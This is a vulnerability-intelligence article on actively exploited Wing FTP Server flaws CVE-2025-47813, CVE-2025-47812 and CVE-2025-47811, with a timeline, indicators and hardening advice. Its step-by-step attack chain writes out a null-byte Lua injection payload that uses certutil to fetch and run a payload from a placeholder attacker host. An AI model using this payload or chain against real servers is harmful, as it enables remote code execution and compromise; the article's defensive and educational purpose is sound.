What is CVE-2025-47811 and why has it not been patched?

CVE-2025-47811 is a privilege escalation design flaw in Wing FTP Server. The administrative web interface runs as root on Linux and NT AUTHORITY/SYSTEM on Windows by default, with no privilege separation or sandboxing — even for anonymous accounts. This means any code execution achieved through CVE-2025-47812 automatically runs with maximum system privileges. The vendor has publicly stated they consider this behavior acceptable and will not patch it. CVE-2025-47811 remains unpatched through the current release. Organizations should factor this into their risk assessment when evaluating Wing FTP Server as a platform.

Vulnerability Intelligence

CISA Adds Wing FTP CVE-2025-47813 to KEV: Server Path Leak Fuels Active Attacks

NoHackie

March 18, 2026 30 min read

On March 16, 2026, CISA added CVE-2025-47813 — a Wing FTP Server information disclosure vulnerability — to its Known Exploited Vulnerabilities catalog. Despite carrying only a medium CVSS score of 4.3, the flaw is being weaponized in live attacks. The reason is straightforward: it hands attackers the server's installation path, a critical piece of intelligence that makes the companion critical-severity remote code execution bug significantly easier to exploit.

Key figures — click any row to expand

CVE-2025-47813 carries a CVSS 3.1 base score of 4.3 — medium severity. That score reflects limited standalone impact: information disclosure only, no write access, no code execution. CISA placed it on the KEV catalog regardless because severity score and exploitation impact are different measurements. When chained with CVE-2025-47812, the effective impact of this flaw escalates to CVSS 10.0.

CVE-2025-47812 is a CVSS 10.0 null byte and Lua code injection flaw in the same Wing FTP Server web interface. It allows unauthenticated attackers to achieve remote code execution as SYSTEM on Windows or root on Linux. The path disclosure from CVE-2025-47813 is what makes this flaw reliably exploitable at scale, particularly against Windows targets with non-standard installation paths.

Julien Ahrens published full technical write-ups and proof-of-concept code on June 30, 2025. Huntress confirmed the first in-the-wild exploitation of CVE-2025-47812 on July 1, 2025 — one day later. This 24-hour window between public PoC and active exploitation is consistent with how financially motivated attackers prioritize file transfer server vulnerabilities. Standard patch cycles measured in weeks or months are not sufficient for this threat class.

Censys identified approximately 5,004 Wing FTP Server instances specifically exposing their web interfaces directly to the internet around the time of PoC publication in late June and early July 2025 — out of 8,103 total Wing FTP devices detected. Only web-interface-exposed instances are vulnerable to CVE-2025-47812 and CVE-2025-47813, since both exploits require HTTP POST requests. The remaining hosts identified via FTP and SSH banners lack the exposed HTTP interface and are not susceptible to these specific exploits. Organizations that restrict the web interface to trusted IP ranges or place it behind a VPN are not in this exposure category regardless of patch status.

Wing FTP Server 7.4.4 — which patches CVE-2025-47813 — was released on May 14, 2025. CISA added CVE-2025-47813 to the KEV catalog on March 16, 2026: roughly ten months later. This gap is not a sign the vulnerability was dormant. It reflects how long independent documentation of the path disclosure step as an actively exploited component took to accumulate sufficiently for a formal KEV listing. Organizations should not treat the listing date as the exploitation start date.

The addition follows a pattern that defenders have come to recognize in the managed file transfer space. Systems that sit at the network perimeter handling high-value data — financial records, backups, proprietary files — attract persistent attacker attention. Wing FTP Server, used by more than 10,000 customers worldwide according to the vendor, including organizations such as the U.S. Air Force, Airbus, Reuters, and Sony, fits that profile precisely. CISA's March 16 action gives federal agencies a hard deadline of March 30, 2026 to patch. Private sector organizations are strongly encouraged to treat that same date as their own target.

MITRE ATT&CK Techniques

What Is Wing FTP Server and Who Uses It

Wing FTP Server is a commercial file transfer solution available for Windows, Linux, and macOS. It supports FTP, FTPS, SFTP, and HTTP/HTTPS protocols and is widely deployed by businesses, managed service providers, and hosting companies that need to securely share and manage files across networks. Its web-based administration interface — built on an embedded HTTP server — is central to how administrators and authenticated users interact with the platform, and it is precisely that web interface where both critical vulnerabilities discovered by researcher Julien Ahrens reside.T1190

The software's broad deployment across multiple industries and its frequent exposure at network perimeters make it a high-priority target. File transfer servers occupy a particularly sensitive position in enterprise architecture: they typically hold or facilitate access to large volumes of sensitive data while maintaining inbound and outbound connectivity that lateral movement-focused attackers prize. That combination — rich data access plus network positioning — is why the Wing FTP vulnerabilities attracted rapid exploitation interest after technical details were published.

The Vulnerability: CVE-2025-47813 Explained

CVE-2025-47813 is an information disclosure vulnerability classified under CWE-209, which covers the generation of error messages that contain sensitive information. The flaw exists in how Wing FTP Server's web interface processes the UID session cookie value on the /loginok.html endpoint. When a logged-in user — or an attacker who has authenticated, including via an anonymous account — sends a request with a UID cookie value that exceeds the maximum path length permitted by the underlying operating system, the server does not handle the error gracefully. Instead, it generates a verbose error message that reveals the full local installation path of the application.T1083

According to Julien Ahrens of RCE Security, when a UID cookie value exceeds the operating system's maximum path length, Wing FTP Server responds with an error message that exposes the full local server installation path — rather than handling the oversized input gracefully.

Researcher Julien Ahrens of RCE Security discovered and responsibly disclosed this vulnerability alongside two others — CVE-2025-47812 and CVE-2025-27889 — and published proof-of-concept exploit code on GitHub. The CVE was formally published in July 2025, following Wing FTP's release of version 7.4.4 on May 14, 2025, which patched all three issues. All Wing FTP Server versions at or below 7.4.3 are affected. The CVSS 3.1 vector for CVE-2025-47813 is AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, reflecting that the attack is remotely exploitable, requires low privileges, and needs no user interaction — though the resulting compromise is limited to information disclosure on its own.

The third vulnerability disclosed by Ahrens on June 30, 2025, CVE-2025-27889, is a link injection flaw at the /downloadpass.html endpoint. It does not sanitize the url parameter, allowing an attacker to inject an arbitrary link. If a target clicks that link and submits the login form, their cleartext password is disclosed to the attacker-controlled destination. Unlike CVE-2025-47812 and CVE-2025-47813, this flaw requires user interaction and carries a CVSS score of 3.4. Critically, it was patched earlier — in Wing FTP Server 7.4.3, released March 30, 2025 — not in 7.4.4. An organization running 7.4.3 is already protected against CVE-2025-27889 but remains fully exposed to CVE-2025-47812 and CVE-2025-47813 until upgrading to 7.4.4 or later.

There is a fourth vulnerability in this family that deserves direct attention: CVE-2025-47811. Unlike the other three, it has no patch and the vendor has stated it will not be fixed. CVE-2025-47811 is a privilege escalation flaw rooted in a design choice: Wing FTP Server's administrative web interface, which listens by default on port 5466, runs as root on Linux and NT AUTHORITY\SYSTEM on Windows with no privilege separation, sandboxing, or rights reduction — even for anonymous accounts. The web interface itself provides legitimate mechanisms to execute arbitrary system commands through the web console and task scheduler, and those commands execute with the highest possible system privileges. Administrative FTP users are not necessarily operating system administrators, meaning this design grants web-level users OS-level power.

Ahrens stated plainly in his CVE-2025-47811 advisory that the vendor's position is to leave the privilege level unchanged, describing it as acceptable behavior despite its role in enabling root access on compromised systems. The practical consequence is that CVE-2025-47811 is the amplifier behind the severity of CVE-2025-47812. Without CVE-2025-47811, a successful Lua injection would execute with whatever limited privileges a properly hardened FTP service might hold. Because Wing FTP runs as root/SYSTEM by default, the injection achieves total system compromise. Organizations that cannot immediately patch or restrict CVE-2025-47812 should treat CVE-2025-47811 as an ongoing unresolved design risk and consider whether Wing FTP Server is the appropriate platform for their environment given the vendor's stated position.

CVE-2025-47813 Exploit Flow

CVE-2025-47813 serves as reconnaissance infrastructure for the critical CVE-2025-47812 remote code execution exploit chain

On its own, CVE-2025-47813 does not allow an attacker to modify data, execute commands, or maintain access. What it does do is reduce the uncertainty in a subsequent exploitation attempt. Knowing the exact installation path allows an attacker to precisely target session files and other filesystem-dependent components of the application — which is directly relevant to the companion vulnerability.

Patch Status

CVE-2025-47813 is patched in Wing FTP Server version 7.4.4, released May 14, 2025. Version 7.4.5 also contains the fix. All organizations running version 7.4.3 or earlier are vulnerable. The CISA KEV listing was updated March 16, 2026, with a federal remediation due date of March 30, 2026. Source: CISA KEV Catalog

The Companion Threat: CVE-2025-47812 and Chained Exploitation

Understanding why CVE-2025-47813 matters requires understanding what it enables. The second vulnerability patched in Wing FTP Server version 7.4.4, CVE-2025-47812, carries a CVSS score of 10.0 — the maximum possible. It is a null byte injection and Lua code injection flaw that allows an attacker to achieve remote code execution as root on Linux systems or as SYSTEM on Windows. The two vulnerabilities were disclosed together by Ahrens, who noted they could be chained for maximum impact.

Ahrens noted in his advisory for CVE-2025-47812 that a successful exploit of CVE-2025-47813 returns the application's local server path — information that directly assists in exploiting the RCE flaw. (RCE Security)

The mechanics of CVE-2025-47812 center on how the /loginok.html endpoint processes the username parameter during authentication. The c_CheckUser() function — responsible for verifying credentials — uses strlen() internally, which truncates strings at null bytes. An attacker can inject a null byte into a username such as anonymous\0[malicious_lua_code]. The authentication check sees only the portion before the null byte and succeeds. But the session creation function, rawset(_SESSION, "username", username), writes the entire, unsanitized username — including the injected Lua payload — into a session file on disk.T1059.010 T1505.003 This class of authentication endpoint exploitation — where credential handling and session writing are governed by different code paths — has produced some of the most severe server-side vulnerabilities in recent years.

When the attacker subsequently makes a GET request to an authenticated endpoint like /dir.html using the returned UID cookie, the server loads and executes that session file, running the injected Lua code with elevated operating system privileges. According to analysis by Huntress, observed attackers used this execution path to hex-decode payloads, run commands via cmd.exe,T1059.003 and use certutil to download and execute malware from remote locations.T1105 T1071.001 Researchers at Fidelis Security noted indicators including the presence of unexpected Lua code fragments in session files and anomalous commands returned after authenticated web interface access.

The link to CVE-2025-47813 becomes clear when you consider that writing and locating session files depends on knowing where the application is installed. The path leak from CVE-2025-47813 removes guesswork from the CVE-2025-47812 exploitation chain, particularly on Windows systems where local path structures are less predictable than on standard Linux installations. According to analysis from RedPacket Security, Windows-based Wing FTP deployments face heightened risk specifically because path disclosure is immediately actionable in environments where filesystem layouts vary between installations.

Vulnerability chaining is not random — it follows a logic of friction reduction. Seen from an attacker's perspective, the Wing FTP chain is nearly mechanical once PoC code is available.

01 Reconnaissance. Scan for Wing FTP Server instances with open web interfaces. Censys found ~5,000 in a single sweep. The web UI is typically on port 8080 or 80/443 — trivial to identify at scale.

02 Authenticate cheaply. Wing FTP supports anonymous FTP by default in many deployments. Anonymous login is sufficient to trigger CVE-2025-47813 — no stolen credentials required.

03 Fire the path disclosure. Send a single HTTP request to /loginok.html with an oversized UID cookie. The server responds with a verbose error containing the full installation path — e.g., C:\Program Files\Wing FTP Server\ or /opt/wingftp/.

04 Inject Lua via CVE-2025-47812. POST a login request to /loginok.html with a username like anonymous\0os.execute('cmd.exe /c certutil -urlcache -f http://[attacker]/payload.exe C:\temp\p.exe && C:\temp\p.exe'). The c_CheckUser() function truncates at \0 and accepts the login. The session creation function writes the full string to a .lua session file at the now-known path.

05 Trigger execution. Make a GET request to any authenticated endpoint — /dir.html works — using the returned UID cookie. The server loads and executes the session file. The injected Lua runs with SYSTEM or root privileges. The attacker has full control.

CVE-2025-47813 is what makes step 04 reliable at scale on Windows. Without the path, attackers must guess or brute-force the session file location — a solvable problem on Linux, a meaningful barrier on Windows. The medium-severity flaw is not cosmetic. It is infrastructure for the critical one.

From Disclosure to Active Exploitation: A Timeline

The history of these vulnerabilities illustrates how quickly threat actors move once technical details become public — and how a flaw can remain unpatched for months before receiving the regulatory attention that forces action.

Exploitation Timeline — click to step through

May 14, 2025

Wing FTP Server 7.4.4 Released

The patch for CVE-2025-47812, CVE-2025-47813, and CVE-2025-27889 ships following responsible disclosure by Julien Ahrens of RCE Security. The patch is available — but adoption is not enforced.

June 30, 2025

Full Technical Write-ups and PoC Published

Ahrens publishes exploit proof-of-concept code on GitHub and the RCE Security blog — including the "What the NULL?!" advisory for CVE-2025-47812. The clock for mass exploitation begins.

June 30 – July 1, 2025

Censys Finds ~5,000 Exposed Instances

Censys identifies 8,103 total Wing FTP Server devices on the internet, of which 5,004 have exposed web interfaces — the exact attack surface for CVE-2025-47812 and CVE-2025-47813. Hosts identified only via FTP and SSH banners lack the HTTP interface and are not vulnerable to these specific exploits.

July 1, 2025

First Confirmed In-the-Wild Exploitation

Huntress detects active exploitation of CVE-2025-47812 on a customer system — just one day after the public write-up appeared. The attacker used null-byte-injected usernames, created malicious .lua session files, and attempted external payload downloads via certutil.

July 10 – July 14, 2025

NVD Publication and First KEV Entry

CVE-2025-47813 is formally published in the National Vulnerability Database on July 10. CISA adds CVE-2025-47812 to the KEV catalog on July 14, acknowledging active exploitation of the RCE flaw.

March 16, 2026

CISA Adds CVE-2025-47813 to KEV

Nearly eight months after the patch and more than eight months after initial exploitation, CISA adds the medium-severity path disclosure flaw to KEV. Federal agencies are given until March 30, 2026 to remediate. The gap is a lesson in how reconnaissance flaws are systematically undervalued.

The roughly eight-month gap between the exploitation of CVE-2025-47812 and the KEV listing of CVE-2025-47813 reflects an important operational reality. Information disclosure vulnerabilities are often treated as lower-priority items by patch management programs. When attackers chain them with critical severity bugs, that deprioritization becomes a vulnerability of its own. CISA's decision to list a CVSS 4.3 vulnerability on KEV is an explicit signal that severity score alone is an insufficient basis for remediation prioritization.

Who Is Exploiting This and What They Are After

CISA's KEV listing confirms active exploitation but does not attribute it to specific threat actors, and the official KEV entry marks "Known To Be Used in Ransomware Campaigns?" as Unknown. The available incident data points to opportunistic, financially motivated attackers — but not confirmed ransomware operators. Huntress's July 2025 analysis of the first confirmed exploitation described behavior that was, by the researchers' own account, relatively unsophisticated. The attackers connected from multiple IP addresses (including a source at 185.196.9.225), sent malformed commands containing non-printable characters and invalid syntax, and were repeatedly frustrated by Microsoft Defender on the targeted host. The attack was detected and contained before any payload fully executed.

The post-exploitation objective in the confirmed Huntress incident was not ransomware deployment — it was persistent remote access. Attackers used the Lua injection to download and execute malicious Lua files, conducted system reconnaissance commands (whoami, ipconfig, netstat), created new unauthorized user accounts for persistence, and attempted to install ScreenConnect remote monitoring and management software. A recovered Lua file retrieved from the host contained a download command pointing to oooooooo11.screenconnect.com, with a connection string extracting to instance-y9tbyl-relay.screenconnect.com. There was no evidence the MSI installer was successfully executed. Huntress's assessment was that the attackers were likely initial access operators — not the final threat actors — whose goal was to establish a foothold to sell or hand off.

File transfer servers are a known ransomware staging ground even when confirmed ransomware is not yet in the picture. The 2023 Cl0p campaigns against MOVEit Transfer and GoAnywhere MFT — which collectively affected hundreds of organizations and produced hundreds of millions of dollars in disclosed losses — established the template. A single compromised Wing FTP Server instance may hold backups, financial exports, HR records, customer data, and inter-departmental transfers that would otherwise require lateral movement through multiple systems to reach. Organizations should not scope their incident response to the Wing FTP host alone if compromise is suspected. The investigation starts there and follows the network.

Why Medium Severity Vulnerabilities Land on KEV

CISA's Known Exploited Vulnerabilities catalog is not a severity ranking system. It is an exploitation tracking system. The catalog exists, as established under Binding Operational Directive 22-01, to maintain a living list of CVEs that carry significant risk to the federal enterprise because they are being used in real attacks — regardless of their theoretical severity score. CVE-2025-47813's addition to the catalog alongside entries for vulnerabilities with CVSS scores of 9.0 and above underscores this point directly.

The eight-month gap between the July 2025 KEV listing of CVE-2025-47812 and the March 2026 listing of CVE-2025-47813 is worth interrogating. Both vulnerabilities were patched simultaneously, disclosed simultaneously, and exploited in the same chain. The most likely explanation is evidentiary: CISA's standard for KEV listing requires confirmed in-the-wild exploitation — not theoretical exploitability, not published PoC code, but observed use in real attacks. In July 2025, the exploitation evidence for CVE-2025-47812 was immediate. CVE-2025-47813 may have been used in the same chain but not yet documented independently as an exploited component. As exploitation continued and analysts accumulated evidence specifically attributing the path disclosure step to active campaigns, the threshold for a separate listing was reached. For defenders, that distinction matters: CVE-2025-47813 has almost certainly been in use since July 2025 — the March 2026 listing means the evidence crossed CISA's documentation bar, not that exploitation started then.

The broader pattern here is one security teams should internalize: attackers increasingly chain medium and low severity vulnerabilities to achieve high-impact outcomes. An information disclosure flaw provides reconnaissance. Reconnaissance reduces exploitation friction. Reduced exploitation friction means that a critical vulnerability that might otherwise require time-consuming pre-attack enumeration becomes reliably exploitable at scale. The KEV catalog entry for CVE-2025-47813 acknowledges that it is performing exactly that function in ongoing campaigns.

CISA's KEV entry for CVE-2025-47813 describes the flaw as a vulnerability that generates an error message containing sensitive information when a long value is used in the UID cookie. (CISA, KEV Catalog, March 16, 2026)

The catalog also notes, as it does for every entry, that this type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. That language is formulaic, but the underlying logic is substantive: file transfer servers are a proven target class. The 2023 campaigns against MOVEit and GoAnywhere MFT demonstrated that threat actors — including financially motivated ransomware groups — treat file transfer infrastructure as a high-value target worth investing significant resources to exploit.

Wing FTP's KEV appearances in both July 2025 and March 2026 place it firmly in that same threat landscape. Organizations that have not patched since the initial CVE-2025-47812 KEV listing are now operating with both a critical RCE vulnerability and a confirmed information disclosure vulnerability under active exploitation, with public proof-of-concept code available for both.

What Organizations Must Do Now

The remediation path is unambiguous. Wing FTP Server version 7.4.4 and all subsequent releases, including 7.4.5, address CVE-2025-47813. Organizations running any version at or below 7.4.3 should upgrade immediately. The vendor's release history is documented at wftpserver.com/serverhistory.htm, and the NVD entry for CVE-2025-47813 is available at nvd.nist.gov.

For organizations that cannot patch immediately, CISA's guidance aligned with BOD 22-01 specifies the following mitigations as acceptable interim measures:

Apply vendor-supplied mitigations in full per the published instructions.
Restrict access to the Wing FTP web interface via network segmentation and firewall rules, limiting it to trusted IP ranges rather than exposing it to the internet.
Disable anonymous FTP logins to reduce the attack surface for CVE-2025-47812.
Implement WAF rules to detect and reject requests containing abnormally long UID cookie values.
Enable detailed HTTP and session logging for the Wing FTP service, retaining logs for incident response purposes.
If no patch or mitigation can be deployed promptly, discontinue use of the product until remediation is possible.

Running Wing FTP under a least-privilege service account

The standard guidance above does not address CVE-2025-47811, which has no patch and will not receive one. The vendor's position is that running the service as root or SYSTEM is acceptable. It is not — and organizations can override this design decision themselves.

On Linux, create a dedicated, locked service account with no shell and no home directory, then reassign ownership of the installation and session directories to that account:

useradd --system --no-create-home --shell /usr/sbin/nologin wingftp
chown -R wingftp:wingftp /opt/wingftp/
chmod 750 /opt/wingftp/

Update the Wing FTP service unit file to run as that user:

[Service]
User=wingftp
Group=wingftp

On Windows, create a dedicated local service account, add it to the minimum necessary groups (typically none beyond the built-in service accounts), grant it "Log on as a service" rights via Local Security Policy, and change the Wing FTP service to run under that account in Services Manager. Explicitly deny it access to administrative shares and local admin group membership. This does not make CVE-2025-47812 unexploitable — but it means a successful Lua injection achieves only the permissions of the service account, not SYSTEM. The blast radius of a compromise shrinks substantially.

Harden the session directory against write exploitation

The CVE-2025-47812 exploit chain requires the Wing FTP process to write a malicious session file to the session directory and then execute it. These are two separate filesystem operations, and separating their permission requirements breaks the chain.

On Linux, if the Wing FTP service account has been separated from root, you can mount the session directory with noexec:

/opt/wingftp/sessions /opt/wingftp/sessions none bind,noexec 0 0

The noexec flag prevents the kernel from executing files from that mount point directly. Because Wing FTP executes session files through the Lua interpreter rather than as standalone executables, this specific control may not fully block Lua-level execution — but it eliminates one class of payload delivery and buys time for other controls to fire. More effective on Windows: use an explicit ACL on the session directory that grants the service account write permission but removes execute permission from files created there. Combined with Windows Defender Application Control (WDAC) or AppLocker rules that whitelist WFTPServer.exe but block it from loading Lua files from the session path, the chain can be interrupted at the execution step without preventing the server from functioning normally. This requires testing in a staging environment before production deployment.

Block outbound egress from the Wing FTP process

The confirmed July 2025 exploitation used certutil — invoked from the Wing FTP server process — to pull an external payload via HTTP. The attack relied on outbound internet access from a file transfer server. Most file transfer server deployments have no legitimate operational need for outbound HTTP connections to arbitrary internet destinations. Blocking this specifically at the process level is more durable than general firewall rules, which can be bypassed if an attacker pivots to another process on the same host.

On Windows, a Windows Defender Firewall outbound rule scoped to WFTPServer.exe that denies all outbound connections except to configured client ranges would have stopped the July 2025 payload delivery entirely. On Linux, iptables or nftables rules using the -m owner --uid-owner wingftp match (once the service runs under a dedicated account) can restrict outbound connections by process UID:

iptables -A OUTPUT -m owner --uid-owner wingftp -p tcp --dport 80 -j DROP
iptables -A OUTPUT -m owner --uid-owner wingftp -p tcp --dport 443 -j DROP

Allow only the specific ports and destinations Wing FTP legitimately needs for its operation — typically inbound FTP/SFTP/HTTPS from clients, with no outbound HTTP to the internet. This is not a substitute for patching but it meaningfully limits post-exploitation capability.

Disable Wing FTP's web console and task scheduler

CVE-2025-47811 specifically describes the web console and task scheduler as the mechanisms through which legitimate administrative access produces arbitrary command execution at root/SYSTEM. If your deployment does not operationally require these features — and many do not — disable them in Wing FTP's administrative configuration. The web console (accessible via the admin interface on port 5466) allows running shell commands interactively. The task scheduler allows scheduling commands to run as the service account. Both are off-the-shelf privilege escalation vectors if an attacker gains any level of administrative access to the web interface.

Disabling them does not patch CVE-2025-47811, but it removes the execution surface the vulnerability relies on. Combined with restricting port 5466 access to a specific administrative workstation or jump host — rather than the general network — the attack surface of the admin interface shrinks to a small, tightly controlled footprint.

Deploy real-time file integrity monitoring on the session directory

Reactive threat hunting after a suspected compromise is slow. A faster approach is file integrity monitoring (FIM) configured specifically on the Wing FTP session directory, alerting in real time whenever a new .lua file is created or an existing one grows beyond a defined size threshold.

On Linux, auditd can watch the session directory with minimal overhead:

auditctl -w /opt/wingftp/sessions/ -p wa -k wingftp_sessions

This generates an audit event for every write and attribute-change in the session directory. Filter these events in your SIEM for files whose size exceeds 500 bytes — any such event during a session that did not correspond to a known large file transfer operation should trigger investigation. On Windows, enable Object Access auditing on the session folder via Group Policy, and use a SIEM or Wazuh agent to consume the Security event log for Event ID 4663 (file write) scoped to that path. The alert latency between exploit execution and defender notification in this setup is measured in seconds, not hours.

Build a structured log pipeline, not just verbose logging

Enabling verbose logging is necessary but not sufficient. Wing FTP's HTTP access logs are flat-file text logs that most SIEMs will ingest as unstructured strings. To make the UID cookie length detectable as a queryable field, you need a log parser — not just log ingestion.

The Wing FTP HTTP access log records requests in a format similar to Combined Log Format. Cookie headers are logged in the full request string. Write a custom parser in your SIEM (Splunk, Elastic, Sentinel, QRadar, etc.) that:

Extracts the UID cookie value from the Cookie: header in Wing FTP HTTP access log lines.
Calculates the character length of that value.
Indexes it as a numeric field (uid_cookie_length).
Fires an alert when that field exceeds 300 on a request to /loginok.html.

Without this structured extraction, "enable logging" produces gigabytes of text that no alert rule can query against the right field. With it, you have a real-time detection that catches CVE-2025-47813 exploitation attempts before the path is disclosed and before the chain progresses to CVE-2025-47812.

Micro-segment the Wing FTP host at the network layer

Patching and hardening the Wing FTP host addresses the immediate vulnerability. Micro-segmentation limits the blast radius if the host is ever compromised through a future flaw. A file transfer server has a well-defined, narrow communication profile: it accepts inbound connections from clients on specific ports, and it may need to reach specific backend storage or directory services. Nothing else.

Place the Wing FTP host in a dedicated VLAN or network zone with a deny-by-default east-west policy. Define explicit allow rules only for:

Inbound FTP (21), FTPS (990), SFTP (22), HTTPS (443) from authorized client ranges.
Inbound admin access on port 5466 from a specific jump host or management VLAN only.
Outbound access to any NAS, SAN, or file share the server legitimately serves.
Outbound access to your SIEM/log aggregator.
No outbound internet access from the host unless explicitly required by a documented business need.

With this segmentation in place, a fully compromised Wing FTP host cannot scan internal networks, cannot reach domain controllers, and cannot laterally move to adjacent systems without the traffic being blocked at the network layer and logged. The attacker's foothold remains isolated. This does not prevent the initial compromise but it changes the economics of the attack — a foothold on an isolated file transfer server is significantly less valuable to an initial access broker than one with unrestricted internal access.

Assessing whether Wing FTP remains the right platform

CVE-2025-47811 is not a mistake the vendor plans to correct — it is a design philosophy the vendor has explicitly defended. Running a network-facing service as root/SYSTEM with no privilege separation is a structural property of the platform that patch management alone cannot resolve. Organizations evaluating whether to continue on Wing FTP should weigh several factors:

Operational need for the web interface. If your users and administrators access Wing FTP exclusively through FTP/SFTP clients and your team manages it via the CLI or the Windows service manager, the web interface exposure is unnecessary. Consider whether the web interface can be completely disabled rather than merely restricted.
Sensitivity of transferred data. A Wing FTP instance handling financial exports, PII, or health records under regulatory compliance requirements carries a different risk calculus than one handling internal build artifacts. The higher the data sensitivity, the stronger the argument for a platform with documented privilege separation architecture.
Vendor security posture signal. A vendor that publicly declines to patch a privilege escalation vulnerability discovered alongside a CVSS 10.0 RCE flaw is providing a signal about how they will respond to future security research. Organizations with high security maturity requirements should factor vendor response history into platform selection decisions.
Alternatives with better isolation. Platforms such as SFTP-only servers (OpenSSH with ChrootDirectory), Cerberus FTP, or managed cloud-based file transfer services (AWS Transfer Family, Azure Blob with SAS tokens) offer varying degrees of privilege isolation that Wing FTP does not. Any migration evaluation should include a privilege model comparison, not just a feature comparison.

None of this is a recommendation to migrate immediately. Wing FTP 7.4.4 with the hardening controls described above is a defensible configuration. The question is whether a defensible configuration today is sufficient if the vendor's position on privilege isolation does not change, and whether future research produces further CVEs on the same architectural surface.

Security teams should also conduct threat hunting across systems that have been running Wing FTP Server 7.4.3 or earlier. Indicators to look for include unusual session .lua files in the application directory, unexpected outbound network connections originating from the Wing FTP server process (WFTPServer.exe on Windows), evidence of certutil being invoked from the server process, and new user accounts created on the host that are not accounted for in normal operations.T1136 Huntress noted in its July 2025 incident analysis that exploitation activity ramped up rapidly after PoC publication — any unpatched server with internet exposure should be treated as potentially compromised and investigated accordingly.

A forensically precise detail from Huntress's incident analysis: legitimate Wing FTP session object files are named using 64 hexadecimal character filenames with a .lua extension, stored in the server's session directory. Malicious session files created during exploitation follow the same naming convention and will not stand out by name alone. What distinguishes them is file size — legitimate session files are small, storing only username, current directory, and IP address. Inflated session file sizes indicate injected Lua code. Defenders conducting a compromise investigation should enumerate all .lua session files, sort by file size, and manually inspect any that are significantly larger than the typical 200–400 byte range for a clean session object.

A question defenders frequently ask is whether the exploit attempt itself is detectable before damage is done. The answer is yes, with the right logging in place. CVE-2025-47813 requires a request to /loginok.html with a UID cookie value that exceeds the operating system's maximum path length — typically 260 characters on Windows (MAX_PATH) and 4,096 on Linux. An HTTP access log or WAF rule capturing the full cookie header will show a request with a UID value far longer than any legitimate session identifier. Wing FTP's own HTTP logging, if enabled at the verbose level, will record the error that fires in response. Organizations with SIEM coverage of their Wing FTP hosts should write a detection rule for: HTTP requests to /loginok.html where the UID cookie length exceeds 300 characters. A single match is a probable exploitation attempt. Multiple matches in a short window from the same source IP indicate automated scanning. Neither is a false positive scenario in a correctly configured environment — legitimate Wing FTP session cookies do not approach that length.

For federal agencies, the March 30, 2026 deadline is mandatory under BOD 22-01. Failure to meet it is not a theoretical compliance risk — CISA's remediation tracking is active, and the KEV catalog is the operational instrument through which federal network security is enforced. Private sector organizations, while not bound by the directive, should treat the deadline with the same urgency: the threat actors exploiting this vulnerability do not limit their targeting to government infrastructure.

Patching to 7.4.4 closes CVE-2025-47813 and CVE-2025-47812, but it does not harden the deployment. Organizations that patch and then return to the same configuration that made the server exploitable in the first place are one future vulnerability away from the same problem. The configuration recommendations listed above — restricting web interface access to trusted IPs, disabling anonymous FTP, enabling verbose logging, running the service under a least-privilege account, segmenting the host at the network layer — remain valid as permanent hardening measures regardless of patch status.

Exposure Self-Assessment — answer to estimate your risk posture

Is your Wing FTP Server web interface exposed to the internet (not restricted to trusted IPs)?

Are you running Wing FTP Server version 7.4.3 or earlier (unpatched)?

Are anonymous FTP logins enabled on your Wing FTP Server instance?

Do you lack WAF rules inspecting UID cookie length on requests to the Wing FTP web interface?

Was your Wing FTP Server internet-accessible between July 2025 and today without having been investigated for compromise?

Key Takeaways

Patch to Wing FTP Server 7.4.4 or later immediately. CVE-2025-47813 and CVE-2025-47812 are both patched in 7.4.4, released May 14, 2025. If your organization is still running 7.4.3 or earlier, you are exposed to a confirmed-exploited information disclosure flaw and a CVSS 10.0 remote code execution vulnerability with public PoC code available.
CVSS score is not the whole story. CVE-2025-47813 earned a 4.3 — medium severity. It is on the CISA KEV catalog because it is being used in real attacks as a precursor to critical-severity exploitation. Patch management programs that filter only on high or critical severity will miss this class of threat.
Chained vulnerabilities require chained remediation. Patching CVE-2025-47812 without patching CVE-2025-47813 leaves the reconnaissance capability in attacker hands. Both vulnerabilities share a patch: version 7.4.4. There is no reason to treat them as separate remediation tasks.
File transfer servers demand elevated attention. Wing FTP, MOVEit, GoAnywhere, and similar platforms sit at the intersection of high-value data and network perimeter exposure. Attackers know this. Organizations running these platforms should apply patches faster than the standard patch cycle and maintain active monitoring of the processes and file directories associated with them.
Hunt for post-exploitation indicators on unpatched systems. Any Wing FTP Server instance running 7.4.3 or earlier that was internet-accessible between July 2025 and the date of patching should be treated as a potential compromise and investigated using the indicators described above before being restored to normal operation.

The addition of CVE-2025-47813 to the KEV catalog nearly ten months after the patch was available is a reminder that vulnerability management is not a one-time event triggered by publication. It is an ongoing process that requires monitoring of both CVE disclosures and exploitation intelligence. CISA's catalog exists precisely to bridge that gap — translating exploitation evidence into mandatory action. Organizations that act on KEV additions promptly, rather than waiting for their own detection capabilities to surface a breach, are the ones that avoid becoming the next incident report.

How to Remediate CVE-2025-47813 and CVE-2025-47812

Identify affected versions. Determine whether your Wing FTP Server installation is running version 7.4.3 or earlier. All versions at or below 7.4.3 are affected by both CVE-2025-47813 and CVE-2025-47812. Check the installed version via the Wing FTP admin panel or the vendor release history at wftpserver.com/serverhistory.htm.
Upgrade to Wing FTP Server 7.4.4 or later. Version 7.4.4, released May 14, 2025, patches CVE-2025-47813, CVE-2025-47812, and CVE-2025-27889. Version 7.4.5 and all subsequent releases also contain the fix. This is the primary and preferred remediation action.
Run the Wing FTP service under a dedicated least-privilege account. On Linux, create a locked wingftp system account with no shell and reassign ownership of the installation directory to it. Update the systemd unit with User=wingftp. On Windows, create a dedicated service account, assign "Log on as a service" rights, and remove it from all administrative groups. This mitigates CVE-2025-47811, which has no vendor patch.
Apply interim mitigations if patching is not immediately possible. Restrict access to the Wing FTP web interface via network segmentation and firewall rules, limiting it to trusted IP ranges. Disable anonymous FTP logins. Implement WAF rules to detect and reject requests containing abnormally long UID cookie values. Enable detailed HTTP and session logging.
Block outbound egress from the Wing FTP process. On Windows, add a Windows Defender Firewall outbound rule scoped to WFTPServer.exe that denies all outbound internet traffic. On Linux, use iptables -m owner --uid-owner wingftp rules to restrict outbound HTTP/HTTPS from the service account. This prevents payload download via certutil even if code execution succeeds.
Disable the Wing FTP web console and task scheduler if not operationally required. These features allow arbitrary command execution at the service privilege level and are the mechanism CVE-2025-47811 describes. Restrict admin interface port 5466 to a specific management workstation or jump host.
